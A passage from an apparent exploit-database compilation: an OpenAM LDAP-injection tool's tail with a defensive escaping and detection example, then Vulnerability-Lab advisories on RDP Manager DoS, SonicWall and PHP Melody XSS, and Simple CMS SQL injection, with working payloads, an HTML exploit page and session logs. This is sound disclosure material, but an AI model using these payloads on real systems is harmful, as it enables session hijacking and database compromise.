    .'''''-.   .-'''''''-.     .'''''-.     ,---.                 .'''''-.    .-''''-.    ,---. ,--------.    .------.  .---.  
   /   ,-.  \ / ,'''''''. \   /   ,-.  \   /_   |                /   ,-.  \  /  _ _   \  /_   | |   _____|   /  .-.   \ \   /  
  (___/  |   ||/ .-./ )  \|  (___/  |   |    ,_ |               (___/  |   ||  ( ' )  |    ,_ | |  )        /  /   '--' |   |  
        .'  / || \ '_ .')||        .'  / ,-./  )|   _ _    _ _        .'  / | (_{;}_) |,-./  )| |  '----.   |  .----.    \ /   
    _.-'_.-'  ||(_ (_) _)||    _.-'_.-'  \  '_ '') ( ' )--( ' )   _.-'_.-'  |  (_,_)  |\  '_ '')|_.._ _  '. |   _ _  '.   v    
  _/_  .'     ||  / .  \ ||  _/_  .'      > (_)  )(_{;}_)(_{;}_)_/_  .'      \        | > (_)  )   ( ' )   \|  ( ' )   \ _ _   
 ( ' )(__..--.||  '-''"' || ( ' )(__..--.(  .  .-' (_,_)--(_,_)( ' )(__..--.  '----'  |(  .  .-' _(_{;}_)  || (_{;}_)  |(_I_)  
(_{;}_)      |\'._______.'/(_{;}_)      | '-''-'|             (_{;}_)      |  .--. /  / '-''-'| |  (_,_)  / \  (_,_)  /(_(=)_) 
 (_,_)-------' '._______.'  (_,_)-------'   '---'              (_,_)-------'  )_____.'    '---'  '...__..'   '...__..'  (_I_)  

 				~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
  
`)
}
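The tool above works because the value of the webfinger `resource` parameter ends up inside an LDAP search filter unescaped: the payload's leading `)` closes the clause the server built around the username and the `(sunKeyValue=userPassword=<prefix>*)` that follows becomes a clause of the attacker's choosing, so each request answers one yes/no question about the next character. The server-side fix is to escape every user-supplied filter value per RFC 4515 before interpolation, and the same metacharacter rule serves as a detector for inbound requests. The Python below is an added example, not code from the advisory, GuidePoint or OpenAM: the `objectClass`/`uid` attribute names in the lookup filter are assumptions, and the sample request target is constructed in the shape the tool sends (prefix under test `a`).

```python
from urllib.parse import parse_qs, urlsplit

# RFC 4515 escapes for the characters that are special inside an LDAP filter value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Constructed request target in the shape the tool above sends; the prefix under test is the
# single character 'a' and the trailing %2526 follows the tool's payload template.
SAMPLE_REQUEST_TARGET = (
    "/openam/.well-known/webfinger?resource=http://x/amAdmin)(sunKeyValue=userPassword=a*)(%2526"
    "&rel=http://openid.net/specs/connect/1.0/issuer"
)


def escape_filter_value(value: str) -> str:
    """Escape a user-controlled value so it can only be compared, never restructure the filter."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def user_lookup_filter_vulnerable(username: str) -> str:
    """Raw interpolation: the pattern the advisory's injection relies on.
    The attribute names are assumptions, not OpenAM's actual query."""
    return "(&(objectClass=person)(uid=%s))" % username


def user_lookup_filter_hardened(username: str) -> str:
    """Same query with the value escaped per RFC 4515."""
    return "(&(objectClass=person)(uid=%s))" % escape_filter_value(username)


def count_simple_clauses(filter_text: str) -> int:
    """Count (attr=value) clauses, honouring \\XX escapes, to show whether input changed the filter."""
    count, i = 0, 0
    while i < len(filter_text):
        ch = filter_text[i]
        if ch == "\\":
            i += 3                      # skip an escape of the form \XX
            continue
        if ch == "(" and filter_text[i + 1 : i + 2] not in ("&", "|", "!"):
            count += 1
        i += 1
    return count


def resource_from_request(request_target: str) -> str:
    """Pull the (percent-decoded) webfinger 'resource' parameter out of a request target."""
    query = urlsplit(request_target).query
    return parse_qs(query).get("resource", [""])[0]


def looks_like_filter_injection(value: str) -> bool:
    """Detection rule for inbound values: any filter metacharacter is a reason to reject and alert."""
    return any(ch in value for ch in "()*\\\x00")


if __name__ == "__main__":
    injected = "amAdmin)(sunKeyValue=userPassword=a*)("
    print("vulnerable:", user_lookup_filter_vulnerable(injected))
    print("hardened:  ", user_lookup_filter_hardened(injected))
    print("flagged:   ", looks_like_filter_injection(resource_from_request(SAMPLE_REQUEST_TARGET)))
```

With the raw value the filter grows from two simple clauses to four; with escaping it stays at two and the `*` that drives the prefix search becomes a literal `\2a`. For monitoring, `looks_like_filter_injection` applied to the decoded `resource` parameter in webfinger access logs flags the tool's traffic on the first request, long before 1700 of them have been answered.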
            
# Exploit Title: RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.cinspiration.de/uebersicht4.html
# Software Link: https://www.cinspiration.de/download.html
# Version: 4.9.9.3
# Tested on: Linux

Document Title:
===============
RDP Manager v4.9.9.3 - Local Denial of Service Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2309


Release Date:
=============
2021-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
2309


Common Vulnerability Scoring System:
====================================
3.6


Vulnerability Class:
====================
Denial of Service


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
RDP-Manager is a program for the better administration of several remote desktops and further connections. The connection parameters
as well as user name and password can be stored in the program, the latter also encrypted by an external password if desired. When opened,
the connections created are clearly structured in individual tabs in the application window, which means that the overview is retained even
if several connections are open.

(Copy of the Homepage: https://www.cinspiration.de/download.html )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a local denial of service vulnerability in the RDP Manager v4.9.9.3 Windows software client.


Vulnerability Disclosure Timeline:
==================================
2021-06-01: Researcher Notification & Coordination (Security Researcher)
2021-06-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Local


Severity Level:
===============
Low


Authentication Type:
====================
Restricted Authentication (User Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A local denial of service vulnerability has been discovered in the official RDP Manager v4.9.9.3 Windows software client.
A denial of service attack lets an attacker freeze, block or crash a local process, service or component.

The local vulnerability is located in the Verbindungsname and Server input fields of the Verbindung (Neu/Bearbeiten) dialog.
Neither the Verbindungsname nor the Server input limits the number of characters. This allows a local privileged attacker
to add a malformed server entry of a large size that crashes the application permanently (multiple application errors).
The entry can also be placed in a zip backup for import as sqLitedatabase.db3, which makes the software unusable until a full
reinstall with separate deletes is performed to recover.

Successful exploitation of the denial of service vulnerability results in permanent unhandled software and application crashes.

Vulnerable Input(s):
[+] Verbindungsname
[+] Server

Affected Module(s):
[+] Wiederherstellen (sqLitedatabase.db3)


Proof of Concept (PoC):
=======================
The local denial of service vulnerability can be exploited by attackers with system access privileges without user interaction.
For security demonstration or to reproduce the vulnerability, follow the provided information and steps below.


Manual steps to reproduce ...
1. Install the RDP-Manager.exe software for Windows
2. Start the software and add a new entry in the main tab
3. Enter a large number of characters (max 1024) and save the entry
4. The software freezes and crashes with multiple errors in the current session, and after a restart it keeps crashing
Note: Alternatively, you can export a database with a regular valid entry and modify it in the backup for an import
5. Successful reproduction of the local denial of service vulnerability!
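The note under step 4 is the detail a defender should take from this advisory: a length limit enforced only in the edit dialog is bypassed by restoring a backup, so the restore path (Wiederherstellen) needs the same validation as the UI. The Python below is an added example, not the vendor's code. It builds an in-memory stand-in for an imported sqLitedatabase.db3 with one valid and one oversized connection entry, then validates every row before anything is loaded, refusing rather than truncating offending rows. The table layout, column names and the 255-character limit are assumptions; the advisory only reports that no limit exists.

```python
import sqlite3
from typing import Dict, List, Tuple

# Assumed schema for the connection store. The advisory names the file (sqLitedatabase.db3)
# but not its layout, so this table is a stand-in for the demonstration.
SCHEMA = "CREATE TABLE connections (id INTEGER PRIMARY KEY, name TEXT NOT NULL, server TEXT NOT NULL)"

# Assumed per-field limits; the advisory reports that the client enforces none.
FIELD_LIMITS = {"name": 255, "server": 255}


def build_sample_backup() -> sqlite3.Connection:
    """Construct an in-memory stand-in for an imported backup: one valid row, one oversized row."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany(
        "INSERT INTO connections (name, server) VALUES (?, ?)",
        [
            ("office", "rdp.example.internal"),
            ("A" * 2000, "x" * 2000),  # constructed oversized entry modelled on the reproduction step
        ],
    )
    conn.commit()
    return conn


def validate_import(conn: sqlite3.Connection) -> Tuple[List[Dict[str, object]], List[str]]:
    """Return (accepted_rows, rejection_messages).

    Rows that breach a limit are refused outright; silently truncating would hide the fact
    that the backup was tampered with."""
    accepted: List[Dict[str, object]] = []
    rejected: List[str] = []
    for row_id, name, server in conn.execute("SELECT id, name, server FROM connections"):
        problems = [
            f"{field} is {len(value)} chars (limit {FIELD_LIMITS[field]})"
            for field, value in (("name", name), ("server", server))
            if not isinstance(value, str) or len(value) > FIELD_LIMITS[field]
        ]
        if problems:
            rejected.append(f"row {row_id}: " + "; ".join(problems))
        else:
            accepted.append({"id": row_id, "name": name, "server": server})
    return accepted, rejected


def restore_connections(conn: sqlite3.Connection) -> List[Dict[str, object]]:
    """Validate first, then hand only the accepted rows to the application's connection list."""
    accepted, rejected = validate_import(conn)
    for message in rejected:
        print("import rejected:", message)
    return accepted


if __name__ == "__main__":
    for entry in restore_connections(build_sample_backup()):
        print("restored:", entry["name"], "->", entry["server"])
```

Running the same `validate_import` on the dialog input and on the restore path gives one place to maintain the limits, which is what prevents the two paths from drifting apart again.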


Credits & Authors:
==================
N/A - Anonymous [research@vulnerability-lab.com] - https://www.vulnerability-lab.com/show.php?user=N%2FA+-+Anonymous


            
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
# Version: 6.5.4

Document Title:
===============
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2272


Release Date:
=============
2021-10-18


Vulnerability Laboratory ID (VL-ID):
====================================
2272


Common Vulnerability Scoring System:
====================================
5


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
machines (VMs), application workloads and data must be among the top priorities.

(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.


Affected Product(s):
====================
Model: SonicWall SonicOS
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
OS: SonicOS Enhanced


Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted Authentication (Guest Privileges)


User Interaction:
=================
Medium User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
The vulnerability allows remote attackers to hijack session credentials or manipulate client-side requested application content.

The vulnerability is located in the common name input field of the Decryption Service - Common Name - Show Connection Failures module.
Remote attackers with low privileged user accounts can inject their own script code to compromise session credentials. It is also possible
to build specially crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
inject is get and the attack vector is located on the client-side without being persistent.

Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), perform phishing
(non-persistent), redirect to external malicious sources (non-persistent) or manipulate client-side application content.
Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.

Module(s):
[+] Decryption Service


Vulnerable Function(s):
[+] Edit (Bearbeiten)


Vulnerable Parameter(s):
[+] Common Name


Affected Module(s):
[+] Show Connection Failures


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1. Login as restricted or privileged user to the SonicWall SonicOS 6.5.4 virtual firewall application
2. Open Decryption Service > Common Name > Show Connection Failures
3. Click on Edit and inject a js test payload into the restricted client content
4. Clicking anywhere outside the field will temporarily save the payload
5. The script code immediately executes in the web browser's context
6. Successful reproduce of the script code inject web vulnerability!


Vulnerable Source: Connection Failure List (getConnFailureList.json)
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>



--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
https://nsv800.localhost:9281/evil.source
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: text/html;charset=UTF-8
-
https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://nsv800.localhost:9281/logo.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: application/json
Accept-Ranges: bytes


Reference(s):
nsv800.localhost:9281/main.html
nsv800.localhost:9281/getJsonData.json
nsv800.localhost:9281/sslSpyConfigure.html


Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing and encoding the client-side reflected script code that passes through getJsonData.json and sslSpyConfigure.
The input and output parameters need to be sanitized to prevent script code injects.


Security Risk:
==============
The security risk of the client-side cross site web vulnerability in the SonicWall SonicOS series is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to ask for permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
            
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux

Document Title:
===============
Simplephpscripts Simple CMS v2.1 - SQL Injection


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303


Release Date:
=============
2021-10-19


Vulnerability Laboratory ID (VL-ID):
====================================
2303


Common Vulnerability Scoring System:
====================================
7.1


Vulnerability Class:
====================
SQL Injection


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.

(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.


Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Authentication Type:
====================
Restricted Authentication (Moderator Privileges)


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A remote sql-injection vulnerability has been discovered in the official Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject or execute their own sql commands to compromise the dbms
or file system of the application.

The sql-injection web vulnerability is located in the `newUser` and `editUser` function of the `users` module in
the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
already exists, like for example the admin account, each add of the same name or email values results in an unfiltered
mysql exception. The exception is neither filtered nor sanitized, which allows privileged attackers to inject and execute
their own sql commands on the affected database management system. The request method to inject is post and
the attack vector is non-persistent.

Exploitation of the sql injection vulnerability requires user interaction and a privileged web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] newUser
[+] editUser

Vulnerable File(s):
[+] admin.php?act=users

Vulnerable Input(s):
[+] Name
[+] Username
[+] Password

Vulnerable Parameter(s):
[+] name
[+] username
[+] password

Affected Module(s):
[+] Users (act=users) (Backend)


Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by remote attackers with a privileged account and without user interaction.
For security demonstration or to reproduce the sql injection vulnerability follow the provided information and steps below to continue.


PoC: Example
act=addUser&name=[ADD EXISTING DEFAULT VALUE!]&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE!]&password=[ADD EXISTING DEFAULT VALUE!]&submit=Add User


PoC: Exploitation
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=a-1'&submit=Add User


--- PoC Session Logs (POST) ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Content-Type: application/x-www-form-urlencoded
Content-Length: 132
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&email=test@test.de&username=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&password=[ADD EXISTING DEFAULT VALUE]-[SQL-INJECTION!]'&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 1224
content-type: text/html; charset=UTF-8


--- SQL Error Exception Logs ---
Error: SELECT * FROM cms2_users WHERE username='a%20-1'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '%20-1'' at line 1


Solution - Fix & Patch:
=======================
1. Disallow sql errors from being displayed in the frontend and backend. Do not redisplay the broken or malicious query on the client side.
2. Use prepared statements to protect the sql query of the post method request
3. Restrict the post parameters by disallowing special chars such as single or double quotes
4. Set up a filter or validation class to deny broken or manipulated sql queries


Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


# Exploit Title: PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-20
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.phpsugar.com/phpmelody.html
# Version: v3
# Tested on: Linux

Document Title:
===============
PHP Melody v3.0 - Multiple Cross Site Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2290

Bulletin: https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=============
2021-10-20


Vulnerability Laboratory ID (VL-ID):
====================================
2290


Common Vulnerability Scoring System:
====================================
5


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Upload, import, stream or embed any media. The smart way to manage audio & video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple non-persistent cross site scripting vulnerabilities in the PHP Melody v3.0 video cms web-application.


Affected Product(s):
====================
PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple non-persistent cross site web vulnerabilities have been discovered in the official PHP Melody v3.0 video cms web-application.
The vulnerabilities allow remote attackers to inject their own malicious script code with a non-persistent attack vector to compromise
browser to web-application requests on the client-side.

The cross site scripting vulnerabilities are located in the `moved`, `username` and `keyword` parameters of the `categories.php`, `import.php`
and `import-user.php` files. The injection point is located in the get method request and the execution occurs with a non-persistent attack vector
in the status message or exception of the admin panel ui.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects
to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] categories.php
[+] import-user.php
[+] import.php

Vulnerable Parameter(s):
[+] moved
[+] username
[+] keyword

Affected Module(s):
[+] Status Message & Exception


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.


PoC: Payload
%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E


PoC: Exploitation
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E
-
https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E
&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
-
https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4


PoC: Exploit
<html>
<head>
<title>PHP Melody v3.0 - XSS PoC Exploit</title>
</head>
<body>
<!-- #1 -->
<iframe src="https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved=%22%3E%3Ciframe%20src=a%20onload=alert(document.cookie)%3E" width="200" height="200"></iframe>
<!-- #2 -->
<iframe src="https://phpmelody.localhost.com:8080/admin/import-user.php?action=search&username=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1" width="200" height="200"></iframe>
<!-- #3 -->
<iframe src="https://phpmelody.localhost.com:8080/admin/import.php?action=search&keyword=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&results=50&page=1&autofilling=0&autodata=1&oc=1&utc=7&search_category=Comedy&search_orderby=relevance&data_source=youtube&sub_id=4" width="200" height="200"></iframe>
</body>
</html>


--- PoC Session Logs (GET) (moved) ---
https://phpmelody.localhost.com:8080/admin/categories.php?type=genre&id=1&moved="><iframe src=evil.source onload=alert(document.cookie)>
Host: phpmelody.localhost.com:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34


--- PoC Session Logs (GET) (username) ---
https://phpmelody.localhost:8080/admin/import-user.php?action=search&username="><iframe src=evil.source onload=alert(document.cookie)>&results=50&autofilling=0&autodata=1&oc=1&utc=19&data_source=youtube&sub_id=24&page=1
Host: phpmelody.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Cookie: PHPSESSID=acf50832ffd23b7d11815fa2b8f2e17u;
melody_d900e07810ba03257e53baf46a9ada6f=admin; melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; watched_video_list=MSw0LDUsNywy;
pm_elastic_player=normal; aa_import_from=youtube; guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.4.34


Vulnerable Source: Categories.php (type=genre&id=1&moved)
<div class="alert alert-success alert-styled-left"><button type="button" class="close" data-dismiss="alert"
aria-label="Close"><span aria-hidden="true">×</span></button>
Category<strong>Film & animation</strong> moved "><iframe src="evil.source" onload="alert(document.cookie)"> a level.</div>
<div id="display_result" style="display:none;"></div>


Vulnerable Source: Import Videos from User (action=search&username)
<div class="card">
<div class="card-body">
<h5 class="mb-3">Username</h5>
<div class="d-block">
<form name="import-user-search-form" id="import-user-search-form" action="" method="post" class="">					
<div class="input-group mb-3">
<div class="form-group-feedback form-group-feedback-left">
<input name="username" type="text" class="form-control form-control-lg alpha-grey gautocomplete" value=""><iframe src="evil.source" onload="alert(document.cookie)">"
placeholder="Enter username or Channel ID" autocomplete="yt-username" />
<div class="form-control-feedback form-control-feedback-lg">
<i class="icon-search4 text-muted"></i>
</div></div>
<div class="input-group-append">
<select name="data_source" class="form-field alpha-grey custom-select custom-select-lg">
<option value="youtube" selected="selected">Youtube User</option>
<option value="youtube-channel" >Youtube Channel</option>
<option value="dailymotion" >Dailymotion User</option>
<option value="vimeo" >Vimeo User</option>
</select></div>
<div class="input-group-append">
<button type="submit" name="submit" class="btn btn-primary btn-lg" id="search-user-btn">Search</button>
</div></div>


Reference(s):
https://phpmelody.localhost.com:8080/admin/
